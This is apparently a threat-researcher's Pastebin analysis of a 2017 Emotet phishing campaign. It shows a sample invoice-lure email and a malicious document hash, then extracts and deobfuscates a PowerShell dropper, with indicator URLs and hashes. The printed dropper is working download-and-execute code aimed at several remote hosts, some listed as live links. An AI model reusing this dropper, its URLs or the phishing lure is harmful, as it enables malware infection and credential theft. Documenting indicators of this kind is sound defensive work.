Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet / #Geodo campaign - 20170814
- ===== email sample
- Received: from mout-bounce.kundenserver.de ([212.227.15.57]) by
- myserver.example.com with ESMTP/TLS/DHE-RSA-AES128-GCM-SHA256; 14 Aug 2017
- 15:26:17 +0000
- Received: from 10.0.0.33 ([80.55.192.210]) by mrelayeu.kundenserver.de
- (mreue002 [212.227.15.167]) with ESMTPSA (Nemesis) id
- 0M1eYM-1dSEXv06NW-00tk4F for <alejandro.castro@example.com>; Mon, 14 Aug 2017
- 17:26:13 +0200
- From: "Victim.Sender@" <example.com>
- To: "Victim Recepient" <victim.recepient@example.com>
- Subject: re: Invoice 7598
- Thread-Topic: Invoice 7598
- Thread-Index: AQHTFRHPw9OpBpNAQEKYLKx8U0qMSQ==
- Date: Mon, 14 Aug 2017 18:26:12 +0200
- Message-ID: <22953597781.2017814152612@example.com>
- Content-Language: es-MX
- x-ironport-av: E=Sophos;i="5.41,373,1498521600"; d="scan'208";a="96571278"
- received-spf: None (myserver.example.com: no sender authenticity information
- available from domain of postmaster@mout-bounce.kundenserver.de)
- identity=helo; client-ip=212.227.15.57; receiver=imyserver.example.com;
- envelope-from=""; x-sender="postmaster@mout-bounce.kundenserver.de";
- x-conformance=sidf_compatible
- Content-Type: text/plain; charset="iso-8859-1"
- Content-Transfer-Encoding: quoted-printable
- MIME-Version: 1.0
- Hello Victim Recepient,
- Here is your invoice.
- If you have any questions or need further assistance, please let us know.
- Amount due: $1518.99 08/14/2017.
- View And Pay Your Invoice Her.
- http://amgtrade.eu/VDUC152846/
- Most sincerely,
- Victim.Sender@example.com
- ===== Downloader
- hxxp://amgtrade.eu/VDUC152846/
- 9347268076QJOT.doc
- 5df3016ba1cfd870d1d72e75ab9ec1d0a08a7e11d9fe7ec6b32fa0ce468206e7
- https://www.virustotal.com/en/file/5df3016ba1cfd870d1d72e75ab9ec1d0a08a7e11d9fe7ec6b32fa0ce468206e7/analysis/
- ===== Getting powershell script from the DOC
- exiftool 9347268076QJOT.doc |grep Comments| sed -e "s/^Comments.* : //" | base64 -d
- https://www.virustotal.com/en/file/e9f57c8ce9f9b6ec20d8e6a0ea712586a26eed16524c47307d6bfb6ac2a39b00/analysis/
- 9347268076QJOT.ps1
- ${Wsc`RI`pt} = &("{2}{0}{1}"-f 'j','ect','new-ob') -ComObject ("{0}{2}{1}"-f 'WS','ipt.Shell','cr');${wEbcL`iE`Nt} = .("{0}{2}{1}" -f 'new-','ject','ob') ("{0}{2}{1}{3}{4}" -f 'S','tem.Net.WebCli','ys','e','nt');${R`AnD`OM} = &("{2}{1}{0}" -f 'ject','b','new-o') ("{2}{1}{0}"-f 'm','do','ran');${UR`lS} = ("{1}{2}{23}{12}{22}{28}{10}{27}{16}{20}{33}{35}{25}{13}{37}{3}{4}{9}{5}{30}{21}{17}{34}{8}{31}{19}{24}{0}{32}{15}{14}{29}{11}{38}{7}{26}{6}{36}{18}" -f's','h','tt','s','.c','cLQsCv/,h','/hwPu','o.','udujem.c','om.br/Q','S','/,http://nemesismedia.','r','p:/','G','cf','k','//','YC/','/IXCKoJdH/,http://s','x',':','cameron.com','p://trevo','hani','tt','uk','nm','/L','yQLtJMI','ttp','om','s.com/pub/','T/','l',',h','nc','/forteboy','c').("{1}{0}" -f 'plit','S').Invoke(',');${N`AmE} = ${rA`NdOm}.("{0}{1}"-f'ne','xt').Invoke(1, 65536);${PA`TH} = ${e`Nv:Te`mp} + '\' + ${N`AMe} + ("{1}{0}" -f'xe','.e');foreach(${U`RL} in ${uR`LS}){try{${W`eBcl`I`eNt}.("{2}{0}{1}{3}"-f 'oadFi','l','Downl','e').Invoke(${U`Rl}.("{1}{0}"-f'ing','ToStr').Invoke(), ${pA`TH});&("{3}{1}{0}{2}"-f 'roce','-P','ss','Start') ${pa`TH};break;}catch{.("{1}{0}{2}"-f 'e-ho','writ','st') ${_}."exce`ptIon"."M`esSage";}}
- ===== Deobfuscation powershell
- $ cat 9347268076QJOT.ps.001
- ${WscRIpt} = new-object -ComObject 'WScript.Shell'
- ${wEbcLiENt} = new-object 'System.Net.WebClient'
- ${RAnDOM} = new-object 'random'
- ${URlS} = ("http://trevorcameron.com/LyQLtJMIAnmkxT/{35}{25}{13}{37}{3}{4}{9}{5}{30}{21}{17}{34}{8}{31}{19}{24}{0}{32}{15}{14}{29}{11}{38}{7}{26}{6}{36}{18}"
- -f
- 's','h','tt','s','.c','cLQsCv/,h','/hwPu','o.','udujem.c','om.br/Q',
- 'S','/,http://nemesismedia.','r','p:/','G','cf','k','//','YC/','/IXCKoJdH/,http://s',
- 'x',':','cameron.com','p://trevo','hani','tt','uk','nm','/L','yQLtJMI',
- 'ttp','om','s.com/pub/','T/','l',',h','nc','/forteboy','c').
- Split.Invoke(',');
- ${NAmE} = ${rANdOm}.next.Invoke(1, 65536);
- ${PATH} = ${eNv:Temp} + '\' + ${NAMe} + ("{1}{0}" -f'xe','.e');
- foreach(${URL} in ${uRLS}){
- try{
- ${WeBclIeNt}.downloadFile.Invoke(${URl}.ToString.Invoke(), ${pATH});
- Start-Process ${paTH};
- break;
- }catch{
- write-host ${_}."exceptIon"."MesSage";
- }
- }
- ===== Deobfuscating the URLs
- ipython
- In [1]: a=['s','h','tt','s','.c','cLQsCv/,h','/hwPu','o.','udujem.c','om.br/Q','S','/,http://nemesismedia.','r','p:/','G','cf','k','//','YC/','/IXCKoJdH/,http://s','x',':','cameron.com','p://trevo','hani','tt','uk','nm','/L','yQLtJMI','ttp','om','s.com/pub/','T/','l',',h','nc','/forteboy','c']
- In [4]: URLS="{1}{2}{23}{12}{22}{28}{10}{27}{16}{20}{33}{35}{25}{13}{37}{3}{4}{9}{5}{30}{21}{17}{34}{8}{31}{19}{24}{0}{32}{15}{14}{29}{11}{38}{7}{26}{6}{36}{18}"
- In [5]: URLS.replace("{", "a[")
- Out[5]: 'a[1}a[2}a[23}a[12}a[22}a[28}a[10}a[27}a[16}a[20}a[33}a[35}a[25}a[13}a[37}a[3}a[4}a[9}a[5}a[30}a[21}a[17}a[34}a[8}a[31}a[19}a[24}a[0}a[32}a[15}a[14}a[29}a[11}a[38}a[7}a[26}a[6}a[36}a[18}'
- In [6]: URLS.replace("{", "a[").replace("}", "] + ")
- Out[6]: 'a[1] + a[2] + a[23] + a[12] + a[22] + a[28] + a[10] + a[27] + a[16] + a[20] + a[33] + a[35] + a[25] + a[13] + a[37] + a[3] + a[4] + a[9] + a[5] + a[30] + a[21] + a[17] + a[34] + a[8] + a[31] + a[19] + a[24] + a[0] + a[32] + a[15] + a[14] + a[29] + a[11] + a[38] + a[7] + a[26] + a[6] + a[36] + a[18] + '
- In [14]: eval(URLS.replace("{", "a[").replace("}", "] + ")[0:-3])
- Out[14]: 'http://trevorcameron.com/LSnmkxT/,http://forteboys.com.br/QcLQsCv/,http://ludujem.com/IXCKoJdH/,http://shaniss.com/pub/cfGyQLtJMI/,http://nemesismedia.co.uk/hwPuncYC/'
- ===== Download of EXE:
- hxxp://trevorcameron.com/LSnmkxT/
- http://forteboys.com.br/QcLQsCv/
- hxxp://ludujem.com/IXCKoJdH/
- hxxp://shaniss.com/pub/cfGyQLtJMI/
- hxxp://nemesismedia.co.uk/hwPuncYC/
- hxxp://trevorcameron.com/LSnmkxT/
- -> bb3887abecf81ccb0651afe420944997541070cf6a8c715a6239d507e9130cdd
- http://forteboys.com.br/QcLQsCv/
- hxxp://ludujem.com/IXCKoJdH/
- -> 2d8c8c041ce20d317055abf412bbccc46cc7d7bee6ae70121904e25d8fef75dd
- hxxp://shaniss.com/pub/cfGyQLtJMI/
- -> fcb60d4744cf36b48196ebf4cc432e3958aef7c3cc66ae46f5abd4a2feb73d49
- hxxp://nemesismedia.co.uk/hwPuncYC/
- -> b2af37edf27969d2781a25074f38cb673d0bb01f13525a6309ac9cf37be74d3f
- ===== Pivot on twitter:
- https://twitter.com/James_inthe_box/status/897077496058748928/photo/1
- http://seodrama.com/QJIL662797/
- https://www.hybrid-analysis.com/sample/3728cecd2be075b09a3a6d8d8c5923fe14cf381e3070266cf05fa51585def305?environmentId=100
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement